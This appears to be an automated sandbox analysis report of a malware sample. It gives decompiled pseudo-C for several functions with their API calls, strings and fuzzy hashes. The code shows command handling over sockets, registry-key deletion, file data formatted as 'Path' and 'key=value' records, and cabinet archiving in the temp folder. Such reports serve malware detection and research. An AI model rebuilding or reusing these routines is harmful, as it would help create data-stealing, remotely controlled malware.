				_push( &_v84);
				if(E0041059E(_t90) != _t81 || E0041059E(_t90,  &_v96, _t81, 0x2710) != _t81) {
					L31:
					return E00410970(_a4);
				} else {
					_t51 = _v96;
					if(_t51 > 0xffff || _t51 == 0) {
						goto L31;
					} else {
						_t52 = E0040F14B(_t51);
						_v88 = _t52;
						if(_t52 == 0) {
							goto L31;
						}
						if(E0041059E(_t90, _t52, _v96, 0x2710) != _v108) {
							L30:
							E0040F15E(_v88);
							goto L31;
						}
						if(_v84 == 0xa) {
							_t55 =  *0x414ad4; // 0x241f5a8
							_v80 = 0x32;
							_v92 = E0040F2C5( *((intOrPtr*)(_t55 + 0x70)));
							if(_v96 >= _t81) {
								_t87 = _v88;
								E0040F19A( &_v80, _v88, _t81);
								_t75 = _v108;
								if(_v108 > _t81) {
									_v96 = E0040F5EA(_t75 + 0xfffffffc, _t87 + 4);
								}
							}
							if(_v92 == 0) {
								goto L30;
							} else {
								_t93 = E00408DDB(_v92, _v80, 0);
								_v92 = _t93;
								if(_t93 == 0) {
									L29:
									E0040F15E(_v92);
									goto L30;
								}
								_push(1);
								_push( &_v76);
								_push(_t93);
								if( *((intOrPtr*)( *_t93 + 0x30))() != 0) {
									L28:
									 *((intOrPtr*)( *_t93 + 8))(_t93);
									goto L29;
								}
								_v76 = 0x1000;
								 *0x414cac(_a4,  &_v80, 8, 0);
								_t65 = _v92;
								if(_v92 == 0) {
									goto L28;
								}
								_t84 = E0040F14B(_t65);
								if(_t84 == 0) {
									goto L28;
								}
								while(1) {
									_t68 =  *((intOrPtr*)( *_t93 + 0xc))(_t93, _t84, _v92,  &_v124);
									if(_t68 != 0 || _v140 == _t68) {
										break;
									}
									_push(_t68);
									_push(_v140);
									_push(_t84);
									_push(_a4);
									if( *0x414cac() == 0xffffffff) {
										break;
									}
									if(E0041059E(_a4, _t84, 4, 0x2710) != 4 ||  *_t84 != _v124) {
										_t93 = _v140;
										break;
									} else {
										_t93 = _v140;
										continue;
									}
								}
								E0040F15E(_t84);
								goto L28;
							}
						}
						if(_v84 == 0x14 && _v96 >= _t81) {
							_push(0);
							_push(_v96);
							_push(_v88);
							_push(_t90);
							if( *0x414cac() == _v112) {
								E0040B712();
							}
						}
						goto L30;
					}
				}
			}























        0x004092b1
        0x004092b9
        0x004092bc
        0x004092bd
        0x004092c2
        0x004092ca
        0x00409481
        0x0040948f
        0x004092e4
        0x004092e4
        0x004092ed
        0x00000000
        0x004092fb
        0x004092fb
        0x00409300
        0x00409306
        0x00000000
        0x00000000
        0x0040931b
        0x00409478
        0x0040947c
        0x00000000
        0x0040947c
        0x00409326
        0x00409362
        0x0040936a
        0x00409377
        0x0040937f
        0x00409381
        0x0040938c
        0x00409391
        0x00409397
        0x004093a5
        0x004093a5
        0x00409397
        0x004093af
        0x00000000
        0x004093b5
        0x004093c3
        0x004093c5
        0x004093cb
        0x0040946f
        0x00409473
        0x00000000
        0x00409473
        0x004093d3
        0x004093d9
        0x004093da
        0x004093e0
        0x00409469
        0x0040946c
        0x00000000
        0x0040946c
        0x004093f1
        0x004093f9
        0x004093ff
        0x00409405
        0x00000000
        0x00000000
        0x0040940c
        0x00409410
        0x00000000
        0x00000000
        0x00409418
        0x00409425
        0x0040942a
        0x00000000
        0x00000000
        0x00409432
        0x00409433
        0x00409437
        0x00409438
        0x00409444
        0x00000000
        0x00000000
        0x00409455
        0x0040945f
        0x00000000
        0x00409414
        0x00409414
        0x00000000
        0x00409414
        0x00409455
        0x00409464
        0x00000000
        0x00409464
        0x004093af
        0x0040932d
        0x0040933d
        0x0040933f
        0x00409343
        0x00409347
        0x00409352
        0x00409358
        0x00409358
        0x00409352
        0x00000000
        0x0040932d
        0x004092ed

        APIs
          • Part of subcall function 0041059E: select.WS2_32(00000000,?,00000000,00000000,00002710), ref: 004105EE
          • Part of subcall function 0041059E: recv.WS2_32(?,?,?,00000000), ref: 00410606
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • send.WS2_32(?,00002710,00002710,00000000), ref: 00409348
          • Part of subcall function 0040B712: GetCurrentThread.KERNEL32 ref: 0040B715
          • Part of subcall function 0040B712: SetThreadPriority.KERNEL32(00000000,?,0040859C), ref: 0040B71C
          • Part of subcall function 0040B712: SHDeleteKeyA.SHLWAPI(80000001,?,?,0040859C), ref: 0040B72F
          • Part of subcall function 0040B712: SHDeleteKeyA.SHLWAPI(80000002,?,?,0040859C), ref: 0040B743
          • Part of subcall function 0040B712: SHDeleteKeyA.SHLWAPI(80000002,?,?,0040859C), ref: 0040B752
          • Part of subcall function 0040B712: Sleep.KERNEL32(000003E8,?,0040859C), ref: 0040B75D
        • send.WS2_32(?,00000000,00000008,00000000), ref: 004093F9
        • send.WS2_32(?,00000000,00002710,00000000), ref: 0040943B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Deletesend$Thread$AllocateCurrentHeapPrioritySleeprecvselect
        • String ID: 2
        • API String ID: 4172955902-450215437
        • Opcode ID: d654dc977708f2c1f062f643f485e7d19027d332a26d356901065599a686bace
        • Instruction ID: bfd2ccd8cf0cb0a2fe6fa2df37bd6dc1d313e2b78ebff444cccbcceaac3556da
        • Opcode Fuzzy Hash: d654dc977708f2c1f062f643f485e7d19027d332a26d356901065599a686bace
        • Instruction Fuzzy Hash: C1518E71508301AFCB10EF61C88496FB7A9EF84314F14893FF594A6292D778DD4ACB6A
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00404D44, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108COMMON
        Download Yara Rule
        C-Code - Quality: 97%
        			E00404D44(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				char _v52;
				char _v2104;
				void* __edi;
				void* __esi;
				intOrPtr _t47;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int _t69;
				signed int _t71;
				signed int _t76;
				intOrPtr _t79;
				intOrPtr* _t86;
				void* _t87;

				_v12 = 0;
				if(E0040FF5C(0, __ecx,  &_v52, _a4) != 0) {
					_v24 = 0;
					_t47 = E0040A6D2(_v48, _v52,  &_v24);
					_v32 = _t47;
					if(_t47 != 0) {
						asm("sbb ebx, ebx");
						_t76 = _v24 - 9;
						_t71 =  !_t69 & _t76;
						_v16 = 0;
						_v20 = 0;
						if(_t71 > 0) {
							_t13 = _t47 + 4; // 0x4
							_t86 = _t13;
							while(1) {
								_t79 =  *((intOrPtr*)(_t86 - 4));
								_v36 = _t79;
								if(_t79 == 0) {
									break;
								}
								_t53 =  *_t86;
								_v28 = _t53;
								if(_t53 == 0) {
									break;
								} else {
									_t54 =  *((intOrPtr*)(_t86 + 4));
									_a4 = _t54;
									if(_t54 == 0) {
										break;
									} else {
										E0040F383(_t79);
										E0040F383(_v28);
										_t81 = _a4;
										E0040F383(_a4);
										if(_v16 == 0) {
											L9:
											wnsprintfA( &_v2104, 0x7ff, "\nPath: %s\n", _a4);
											_t87 = _t87 + 0x10;
											if(E0040A673( &_v12,  &_v2104, 1) == 0) {
												goto L14;
											} else {
												goto L10;
											}
										} else {
											_t76 = _t76 | 0xffffffff;
											if(E0040F65D(_t76, _t81, _t76, _v16) == 0) {
												L10:
												wnsprintfA( &_v2104, 0x7ff, "%s=%s\n", _v36,  *_t86);
												_t87 = _t87 + 0x14;
												if(E0040A673( &_v12,  &_v2104, 1) == 0) {
													L14:
													_v12 = _v12 & 0x00000000;
												} else {
													_v20 = _v20 + 9;
													_t86 = _t86 + 0x24;
													_v16 = _a4;
													if(_v20 < _t71) {
														continue;
													} else {
													}
												}
											} else {
												goto L9;
											}
										}
									}
								}
								goto L15;
							}
							E0040F15E(_v12);
							goto L14;
						}
						L15:
						E0040F17A(_v24, _v32);
					}
					E00410015( &_v52);
				}
				return _v12;
			}
























        0x00404d5a
        0x00404d64
        0x00404d73
        0x00404d76
        0x00404d7b
        0x00404d80
        0x00404d8c
        0x00404d8e
        0x00404d93
        0x00404d95
        0x00404d98
        0x00404d9b
        0x00404da1
        0x00404da1
        0x00404da4
        0x00404da4
        0x00404da7
        0x00404dac
        0x00000000
        0x00000000
        0x00404db2
        0x00404db4
        0x00404db9
        0x00000000
        0x00404dbf
        0x00404dbf
        0x00404dc2
        0x00404dc7
        0x00000000
        0x00404dcd
        0x00404dcd
        0x00404dd5
        0x00404dda
        0x00404ddd
        0x00404de6
        0x00404dfb
        0x00404e0f
        0x00404e15
        0x00404e2b
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00404de8
        0x00404deb
        0x00404df9
        0x00404e2d
        0x00404e43
        0x00404e49
        0x00404e5f
        0x00404e81
        0x00404e81
        0x00404e61
        0x00404e61
        0x00404e68
        0x00404e6b
        0x00404e71
        0x00000000
        0x00000000
        0x00404e77
        0x00404e71
        0x00000000
        0x00000000
        0x00000000
        0x00404df9
        0x00404de6
        0x00404dc7
        0x00000000
        0x00404db9
        0x00404e7c
        0x00000000
        0x00404e7c
        0x00404e85
        0x00404e8b
        0x00404e8b
        0x00404e93
        0x00404e93
        0x00404e9f

        APIs
          • Part of subcall function 0040FF5C: CreateFileW.KERNEL32(?,00000000,?,00000000,00000003,00000000,00000000,00000000,00417FD6,?,?,?,004041FB,00414540,?,00000006), ref: 0040FF88
          • Part of subcall function 0040FF5C: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004041FB,00414540,?,00000006,00000000,00000000,00000000,00000000), ref: 0040FF9B
        • wnsprintfA.SHLWAPI ref: 00404E0F
        • wnsprintfA.SHLWAPI ref: 00404E43
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Filewnsprintf$CreateSize
        • String ID: Path: %s$%s=%s
        • API String ID: 2143265763-3969205073
        • Opcode ID: bd5e16c6728f13eb504174be7855153b3b0a7f0c311cc07aa7e120a653533953
        • Instruction ID: 52418920f6c7bdf9688d5a3e59d72625e1dba354520646ec29fb1432e16de50d
        • Opcode Fuzzy Hash: bd5e16c6728f13eb504174be7855153b3b0a7f0c311cc07aa7e120a653533953
        • Instruction Fuzzy Hash: 2F418EB1D00209ABCF10EF95C841AEEB7B5BF84318F14443AEA44B72D1DB79AA45CBD4
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00404412, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107synchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 84%
        			E00404412(void* __ecx, void* __edx, long _a4) {
				intOrPtr _v40;
				void* _v48;
				char _v56;
				char _v64;
				char _v68;
				char _v72;
				char _v73;
				intOrPtr _v76;
				intOrPtr _v77;
				intOrPtr _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t28;
				intOrPtr _t29;
				void* _t34;
				intOrPtr _t35;
				long _t39;
				long _t43;
				long _t47;
				long _t50;
				long _t60;
				void* _t61;
				void* _t64;
				void* _t65;
				void* _t69;
				long _t73;

				_t64 = __edx;
				_t61 = __ecx;
				 *0x414ed8("mID", _t65, _t69, _t57);
				_t28 = _a4;
				_v73 = 0;
				if(_t28 == 0) {
					_t29 =  *0x414b7c; // 0x418000
					_t4 = _t29 + 0x24; // 0x1a001e
					_t57 =  *_t4 & 0x000000ff;
					__eflags = _t29 + 0x12c;
					E0040ABE5( &_v72,  *_t4 & 0x000000ff, _t69, _t29 + 0x12c);
				} else {
					_v72 = _t28;
				}
				E00412C5E( &_v56);
				_t34 =  *0x414a30; // 0x2210041
				_v48 = _t34;
				_t35 = _v72;
				_v40 = _t35;
				_t78 = _t35;
				if(_t35 == 0 || E0040FD42(_t57,  &_v56, _t78,  &_v64) == 0 || E0040423A(_t64,  &_v64, 0 | _a4 != 0x00000000) == 0) {
					__eflags = _a4;
					if(_a4 == 0) {
						_t39 = E00404196(_t61);
						_t72 = _t39;
						__eflags = _t39;
						if(__eflags != 0) {
							_t60 = E004124A2( &_v68, _t64, __eflags, _t72, 0x4e24, 0x20000000);
							E0040F15E(_t72);
							_t43 = E0040F94A(_t60, _v84);
							__eflags = _t43;
							if(_t43 != 0) {
								_t73 = _t60;
								while(1) {
									__eflags = WaitForSingleObject( *0x414a30, 0x2710);
									if(__eflags == 0) {
										goto L17;
									}
									_v40 = _t73;
									_t47 = E0040FD42(_t60,  &_v56, __eflags,  &_v64);
									__eflags = _t47;
									if(_t47 == 0) {
										L14:
										_t73 = E0040F968(_t73, 1);
										__eflags = _t73;
										if(_t73 != 0) {
											continue;
										} else {
										}
									} else {
										_t50 = E0040423A(_t64,  &_v64, 0);
										__eflags = _t50;
										if(_t50 != 0) {
											_v73 = 1;
										} else {
											goto L14;
										}
									}
									goto L17;
								}
							}
							L17:
							E0040F15E(_t60);
						}
					}
				} else {
					_v73 = 1;
				}
				 *0x414edc("mID");
				if(_a4 == 0) {
					E0040F15E(_v76);
				}
				return _v77;
			}






























        0x00404412
        0x00404412
        0x00404423
        0x00404429
        0x0040442c
        0x00404433
        0x0040443b
        0x00404440
        0x00404440
        0x00404444
        0x0040444e
        0x00404435
        0x00404435
        0x00404435
        0x00404457
        0x0040445c
        0x00404461
        0x00404465
        0x00404469
        0x0040446d
        0x0040446f
        0x004044a2
        0x004044a6
        0x004044ac
        0x004044b1
        0x004044b3
        0x004044b5
        0x004044d0
        0x004044d2
        0x004044dd
        0x004044e2
        0x004044e4
        0x004044e6
        0x004044e8
        0x004044f9
        0x004044fb
        0x00000000
        0x00000000
        0x00404506
        0x0040450a
        0x0040450f
        0x00404511
        0x00404523
        0x0040452c
        0x0040452e
        0x00404530
        0x00000000
        0x00000000
        0x00404532
        0x00404513
        0x0040451a
        0x0040451f
        0x00404521
        0x00404534
        0x00000000
        0x00000000
        0x00000000
        0x00404521
        0x00000000
        0x00404511
        0x004044e8
        0x00404539
        0x0040453a
        0x0040453a
        0x004044b5
        0x00404498
        0x00404498
        0x00404498
        0x00404544
        0x0040454e
        0x00404554
        0x00404554
        0x00404563

        APIs
        • RtlEnterCriticalSection.NTDLL(mID), ref: 00404423
        • RtlLeaveCriticalSection.NTDLL(mID), ref: 00404544
          • Part of subcall function 00404196: CreateMutexW.KERNEL32(004155B4,00000000,?), ref: 004041B1
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • WaitForSingleObject.KERNEL32(00002710,00000000,00000000,00004E24,20000000,00417ED4), ref: 004044F3
          • Part of subcall function 0040FD42: WaitForSingleObject.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000), ref: 0040FD96
          • Part of subcall function 0040FD42: InternetCloseHandle.WININET(00000000), ref: 0040FE2F
          • Part of subcall function 0040423A: CreateMutexW.KERNEL32(004155B4,00000000,?,00000000,00417FD6,?,?), ref: 004042AB
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CreateCriticalMutexObjectSectionSingleWait$CloseEnterFreeHandleHeapInternetLeave
        • String ID: mID
        • API String ID: 3353207558-4014272676
        • Opcode ID: 405419ec6c4936524efaccfe71464f11b98a665448003f078548e1c620c52568
        • Instruction ID: 7851451f523802d159a882c1bc48386f65d26c2afff41652ee24feabc8c54e0b
        • Opcode Fuzzy Hash: 405419ec6c4936524efaccfe71464f11b98a665448003f078548e1c620c52568
        • Instruction Fuzzy Hash: BC31C0B1504300ABC720EF21DC41B9B77D8AFC4759F00457BBA85B72C1D778DD1986AA
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040E13F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 64%
        			E0040E13F(signed int __eax, void* __ecx, intOrPtr _a4, signed int _a8, signed int* _a12) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t29;
				signed int _t31;
				intOrPtr _t36;
				signed int _t38;
				signed char _t43;
				intOrPtr _t48;
				signed char* _t53;
				signed int* _t58;

				 *_a12 =  *_a12 & 0x00000000;
				_t53 = __eax * 0x30 +  *0x414f5c;
				_v8 = 1;
				if(( *_t53 & 0x00000010) != 0) {
					L8:
					if(_v8 != 0) {
						_t51 = _t53[0x20];
						_t31 = _t53[0x1c] - _t53[0x20];
						if(_t31 != 0) {
							if(_a4 != 0 || _a8 != 0) {
								_t48 = 0;
							} else {
								_t48 = 1;
								_a8 = 0x1000;
							}
							if(_a8 < _t31) {
								_t31 = _a8;
							}
							if(_t48 == 0) {
								_t31 = E0040F19A(_a4, _t53[0x18] + _t51, _t31);
								_t53[0x20] = _t53[0x20] + _t31;
							}
						}
						 *_a12 = _t31;
					}
					L18:
					_t29 = _v8;
					L19:
					return _t29;
				}
				_t43 = _t53[4];
				_t58 = RtlAllocateHeap( *0x415fa8, 8, 0x48);
				if(_t58 != 0) {
					_t6 =  &(_t58[1]); // 0x4
					E0040F19A(_t6, _t53, 0x30);
					if(_a4 == 0 && _a8 == 0) {
						 *_t58 =  *_t58 | 0xffffffff;
					}
					 *0x414edc(0x414f68);
					_t36 = E0040D9AA(_t58);
					_v8 = _t36;
					 *0x414ed8(0x414f68);
					_t38 = E0040CC82(_t43);
					if(_t38 == 0xffffffff) {
						goto L2;
					}
					_t53 = _t38 * 0x30 +  *0x414f5c;
					if(( *_t53 & 0x00000010) == 0) {
						goto L18;
					}
					goto L8;
				}
				L2:
				_t29 = 0;
				goto L19;
			}













        0x0040e149
        0x0040e155
        0x0040e15a
        0x0040e161
        0x0040e1d6
        0x0040e1db
        0x0040e1dd
        0x0040e1e3
        0x0040e1e5
        0x0040e1ea
        0x0040e227
        0x0040e1f1
        0x0040e1f1
        0x0040e1f3
        0x0040e1f3
        0x0040e1fd
        0x0040e1ff
        0x0040e1ff
        0x0040e204
        0x0040e210
        0x0040e215
        0x0040e215
        0x0040e204
        0x0040e21b
        0x0040e21b
        0x0040e21d
        0x0040e21d
        0x0040e220
        0x0040e224
        0x0040e224
        0x0040e163
        0x0040e176
        0x0040e17a
        0x0040e186
        0x0040e18a
        0x0040e193
        0x0040e19b
        0x0040e19b
        0x0040e1a4
        0x0040e1ab
        0x0040e1b1
        0x0040e1b4
        0x0040e1bc
        0x0040e1c4
        0x00000000
        0x00000000
        0x0040e1cf
        0x0040e1d4
        0x00000000
        0x00000000
        0x00000000
        0x0040e1d4
        0x0040e17c
        0x0040e17c
        0x00000000

        APIs
        • RtlAllocateHeap.NTDLL(00000008,00000048), ref: 0040E170
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E1A4
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E1B4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$AllocateEnterHeapLeave
        • String ID: essAsUserA
        • API String ID: 414954722-2345198579
        • Opcode ID: b56dbb7ec633f5943a2945972a3f21f7421f2818b1153460ea0c8d4c20ae84df
        • Instruction ID: eddcef4b5af88f9e496c68c6daa2174a4fb794c7592dfd982aabc6cb7e46ed5f
        • Opcode Fuzzy Hash: b56dbb7ec633f5943a2945972a3f21f7421f2818b1153460ea0c8d4c20ae84df
        • Instruction Fuzzy Hash: F231C771500205EBDB248F65C844B9A77A8BF95315F108A7FE815AB3D0D778D961CB48
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00411BE0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 86%
        			E00411BE0() {
				WCHAR* _v4;
				void* _t25;
				intOrPtr _t27;
				WCHAR* _t33;
				intOrPtr* _t35;

				_t33 = 0;
				if(E00411AF9() != 0) {
					_t35 = RtlAllocateHeap( *0x415fa8, 8, 0x954);
					if(_t35 == 0) {
						L7:
						E00411BBF();
					} else {
						_t2 = _t35 + 0x53e; // 0x53e
						if(PathCombineW(_t2, _v4, 0) == 0) {
							L6:
							E0040F15E(_t35);
							goto L7;
						} else {
							_t3 = _t35 + 0x746; // 0x746
							if((GetTempPathW(0x103, _t3) & 0xffffff00 | _t21 > 0x00000000) == 0) {
								goto L6;
							} else {
								 *((intOrPtr*)(_t35 + 0x14)) = 0x7fffffff;
								_t7 = _t35 + 0x10; // 0x10
								 *_t7 = 0x7fffffff;
								 *((intOrPtr*)(_t35 + 0x24)) = 1;
								 *((intOrPtr*)(_t35 + 0x28)) = 1;
								_t10 = _t35 + 0x132; // 0x132
								E0040F19A(_t10, "cabinet.dll", 0xc);
								_t11 = _t35 + 0x232; // 0x232
								_t25 = E0040F19A(_t11, "?O", 2);
								_t12 = _t35 + 4; // 0x4
								_t27 =  *0x415f98(_t12, E00411A65, E004117C0, E004117D3, E004117E6, E004118D2, E00411909, E0041194F, E00411970, E004119BA, E004119F4, _t25, _t35);
								 *_t35 = _t27;
								if(_t27 == 0) {
									goto L6;
								} else {
									_t33 = _t35;
								}
							}
						}
					}
				}
				return _t33;
			}








        0x00411be1
        0x00411bea
        0x00411c04
        0x00411c08
        0x00411cd4
        0x00411cd4
        0x00411c0e
        0x00411c13
        0x00411c22
        0x00411cce
        0x00411ccf
        0x00000000
        0x00411c28
        0x00411c28
        0x00411c41
        0x00000000
        0x00411c47
        0x00411c4c
        0x00411c4f
        0x00411c52
        0x00411c59
        0x00411c5c
        0x00411c64
        0x00411c6b
        0x00411c77
        0x00411c7e
        0x00411cb2
        0x00411cbb
        0x00411cc4
        0x00411cc8
        0x00000000
        0x00411cca
        0x00411cca
        0x00411cca
        0x00411cc8
        0x00411c41
        0x00411c22
        0x00411cd9
        0x00411cdd

        APIs
          • Part of subcall function 00411AF9: LoadLibraryA.KERNEL32(cabinet.dll,00000001,00411BE8,00000000,00411EC2,00000001,00000001,00000000,?,00413656,?,?,00000001,?), ref: 00411B0D
          • Part of subcall function 00411AF9: GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00411B26
          • Part of subcall function 00411AF9: GetProcAddress.KERNEL32(FCIAddFile), ref: 00411B3C
          • Part of subcall function 00411AF9: GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00411B52
          • Part of subcall function 00411AF9: GetProcAddress.KERNEL32(FCIDestroy), ref: 00411B68
          • Part of subcall function 00411AF9: HeapCreate.KERNEL32(00000000,00080000,00000000,?,00413656,?,?,00000001,?), ref: 00411B96
          • Part of subcall function 00411AF9: FreeLibrary.KERNEL32(?,00413656,?,?,00000001,?), ref: 00411BAB
        • RtlAllocateHeap.NTDLL(00000008,00000954,00000001), ref: 00411BFE
        • PathCombineW.SHLWAPI(0000053E,?,00000000,?,00413656,?,?,00000001,?), ref: 00411C1A
        • GetTempPathW.KERNEL32(00000103,00000746,?,00413656,?,?,00000001,?), ref: 00411C34
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressProc$HeapLibraryPath$AllocateCombineCreateFreeLoadTemp
        • String ID: cabinet.dll
        • API String ID: 3318130981-741892446
        • Opcode ID: 9b5c2fb9af840bfb355cfb241e98ad864d9d7b80ae7d24e0aa142cfd724900dc
        • Instruction ID: 3711fc09653c1f1972bfb8e8c856ceb81a8af5b1b34e30448f1aae78df83ad9b
        • Opcode Fuzzy Hash: 9b5c2fb9af840bfb355cfb241e98ad864d9d7b80ae7d24e0aa142cfd724900dc
        • Instruction Fuzzy Hash: BE2101B0280701ABD6209B218C06FD73799AF40B04F10453FB766A67E0EABCD885CB9C
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00404BB0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
        Download Yara Rule
        C-Code - Quality: 54%
        			E00404BB0(void* __eax, void* __ecx, void* __eflags) {
				char _v5;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				intOrPtr _t26;
				intOrPtr _t27;
				signed int _t29;
				intOrPtr _t33;
				void* _t36;
				void* _t39;
				signed int _t42;
				signed int _t43;

				_push(__ecx);
				_push(__ecx);
				_t29 = 0;
				_v5 = 0;
				_v12 = 0;
				_t36 = E0040A332(__eax,  &_v12, __ecx + __eax, 0, 0x64);
				if(_t36 != 0) {
					 *0x414ed8("pVirtualKeyExA", _t39);
					_t16 =  *0x414778; // 0x74537972
					if(E0040F0F6(_t16 + _t36 << 2, 0x41477c) != 0 && _t36 > 0) {
						do {
							_t42 =  *0x414778; // 0x74537972
							_t43 = _t42 << 2;
							_t26 = E0040F5EA(_v12 | 0xffffffff,  *((intOrPtr*)(_v12 + _t29 * 4)));
							_t33 =  *0x41477c; // 0x676e6972
							 *((intOrPtr*)(_t43 + _t33)) = _t26;
							_t27 =  *0x41477c; // 0x676e6972
							if( *((intOrPtr*)(_t43 + _t27)) != 0) {
								 *0x414778 =  *0x414778 + 1;
								_v5 = 1;
							}
							_t29 = _t29 + 1;
						} while (_t29 < _t36);
					}
					E004047F5(_t29);
					 *0x414edc("pVirtualKeyExA");
					E0040F17A(_t36, _v12);
				}
				return _v5;
			}

















        0x00404bb3
        0x00404bb4
        0x00404bb9
        0x00404bc2
        0x00404bc6
        0x00404bce
        0x00404bd2
        0x00404bda
        0x00404be0
        0x00404bf6
        0x00404bfc
        0x00404bff
        0x00404c0b
        0x00404c0e
        0x00404c13
        0x00404c19
        0x00404c1c
        0x00404c25
        0x00404c27
        0x00404c2d
        0x00404c2d
        0x00404c31
        0x00404c32
        0x00404bfc
        0x00404c36
        0x00404c40
        0x00404c4b
        0x00404c50
        0x00404c57

        APIs
        • RtlEnterCriticalSection.NTDLL(pVirtualKeyExA), ref: 00404BDA
        • RtlLeaveCriticalSection.NTDLL(pVirtualKeyExA), ref: 00404C40
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave
        • String ID: pVirtualKeyExA$ryStringW
        • API String ID: 3168844106-3252542104
        • Opcode ID: 01114f00ebe0a06c3a85c11e3a47ed873ba30925897b0b572dfd6d5c0af8b4ec
        • Instruction ID: 6c6708373b0ac867fd58efb6f9f024190aea370be33c94d08b45ee2e35c6143b
        • Opcode Fuzzy Hash: 01114f00ebe0a06c3a85c11e3a47ed873ba30925897b0b572dfd6d5c0af8b4ec
        • Instruction Fuzzy Hash: D9112371500304AFE721ABA8C8496DE7BB5EBCA314F06407AE960733D1CB799C86C728
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004097DF, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
        Download Yara Rule
        C-Code - Quality: 25%
        			E004097DF(intOrPtr __ebx) {
				void* __esi;
				signed int _t15;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				intOrPtr* _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t22 = __ebx;
				if(__ebx == 0 || E0040979F(__ebx) != 0) {
					L13:
					return 0;
				} else {
					 *0x414ed8(0x414a14);
					_t15 =  *0x414a0c; // 0x6f627965
					_t23 =  *0x414a10; // 0x53647261
					if(_t15 <= 0) {
						L6:
						_t26 = 0;
						if(_t15 <= 0) {
							L11:
							if(E0040F0F6(4 + _t15 * 4, 0x414a10) != 0) {
								_t24 =  *0x414a0c; // 0x6f627965
								_t18 =  *0x414a10; // 0x53647261
								 *0x414a0c =  *0x414a0c + 1;
								_t25 = _t18 + _t24 * 4;
								L16:
								 *_t25 = _t22;
								 *0x414edc(0x414a14);
								return 1;
							}
							 *0x414edc(0x414a14);
							goto L13;
						}
						while( *((intOrPtr*)(_t23 + _t26 * 4)) != 0) {
							_t26 = _t26 + 1;
							if(_t26 < _t15) {
								continue;
							}
							goto L11;
						}
						_t25 = _t23 + _t26 * 4;
						if(_t25 != 0) {
							goto L16;
						}
						goto L11;
					}
					_t2 = _t15 * 4; // 0x5364725d
					_t27 = _t23 + _t2 - 4;
					while( *_t27 == 0) {
						_t15 = _t15 - 1;
						_t27 = _t27 - 4;
						 *0x414a0c = _t15;
						if(_t15 > 0) {
							continue;
						}
						goto L6;
					}
					goto L6;
				}
			}












        0x004097df
        0x004097e3
        0x00409857
        0x00000000
        0x004097f0
        0x004097f6
        0x004097fc
        0x00409801
        0x00409809
        0x00409821
        0x00409821
        0x00409825
        0x0040983b
        0x0040984e
        0x0040985c
        0x00409862
        0x00409867
        0x0040986d
        0x00409870
        0x00409871
        0x00409873
        0x00000000
        0x00409879
        0x00409851
        0x00000000
        0x00409851
        0x00409827
        0x0040982d
        0x00409830
        0x00000000
        0x00000000
        0x00000000
        0x00409832
        0x00409834
        0x00409839
        0x00000000
        0x00000000
        0x00000000
        0x00409839
        0x0040980b
        0x0040980b
        0x0040980f
        0x00409814
        0x00409815
        0x00409818
        0x0040981f
        0x00000000
        0x00000000
        0x00000000
        0x0040981f
        0x00000000
        0x0040980f

        APIs
          • Part of subcall function 0040979F: RtlEnterCriticalSection.NTDLL(tate), ref: 004097A9
          • Part of subcall function 0040979F: RtlLeaveCriticalSection.NTDLL(tate), ref: 004097D4
        • RtlEnterCriticalSection.NTDLL(tate), ref: 004097F6
        • RtlLeaveCriticalSection.NTDLL(tate), ref: 00409851
        • RtlLeaveCriticalSection.NTDLL(tate), ref: 00409873
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$Leave$Enter
